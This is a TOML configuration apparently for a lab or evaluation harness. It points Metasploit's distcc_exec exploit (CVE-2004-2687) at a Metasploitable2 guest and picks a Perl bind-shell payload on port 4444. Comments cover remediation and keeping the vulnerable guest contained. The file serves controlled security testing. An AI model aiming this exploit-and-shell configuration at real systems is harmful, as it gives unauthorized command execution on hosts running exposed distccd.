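# Module and payload selection for the distcc check against a Metasploitable2
# guest. Restored to one key per line: collapsed onto a single line the file
# does not parse, and each `#` comment swallows the keys that follow it.
#
# What a hit means for the defender: the distcc port is reachable with no
# access restriction. Remediation is to limit who can reach it (distccd
# --allow, host firewall) or to remove the service.
description = """
distccd v1 unauthenticated command execution (CVE-2004-2687). The distcc
daemon doesn't verify the source of compile jobs, so a crafted DCC_CMD-style
request runs an arbitrary command as the distccd user. Metasploitable2 ships
distccd 2.18.3 listening on 3632. Returns a low-priv shell — paired with a
privesc later if needed; for envelope work the unprivileged shell is enough.
"""

[module]
type = "exploit"
path = "unix/misc/distcc_exec"

[module.options]
# TOML has no interpolation, so "{{ target_ip }}" is a literal string here;
# presumably the harness renders it before the file is loaded (confirm).
RHOSTS = "{{ target_ip }}"
RPORT = 3632

[payload]
# Bind shell on a fixed in-guest port. The host hostfwds this port
# (see runtime.extra_target_ports) so msfrpcd can connect to it
# from the loopback side. Avoids the SLIRP+restrict=on dead-end the
# reverse_tcp payload hits.
#
# NOTE(review): the bind listener has no authentication, so whoever reaches
# the forwarded port first gets the session. Confirm that the hostfwd binds
# the host's loopback address only, not all interfaces.
path = "cmd/unix/bind_perl"

[payload.options]
# Must stay equal to the port listed in runtime.extra_target_ports.
LPORT = 4444

[session]
type = "shell"

[runtime]
# bind_perl opens a new guest port; fleet hostfwds it via SLIRP.
# No bridge egress needed — host connects in, not guest out.
# Keeping the guest without egress also contains the deliberately
# vulnerable target.
requires_bridge = false
# Must list payload.options.LPORT, otherwise the bind port is never forwarded.
extra_target_ports = [4444]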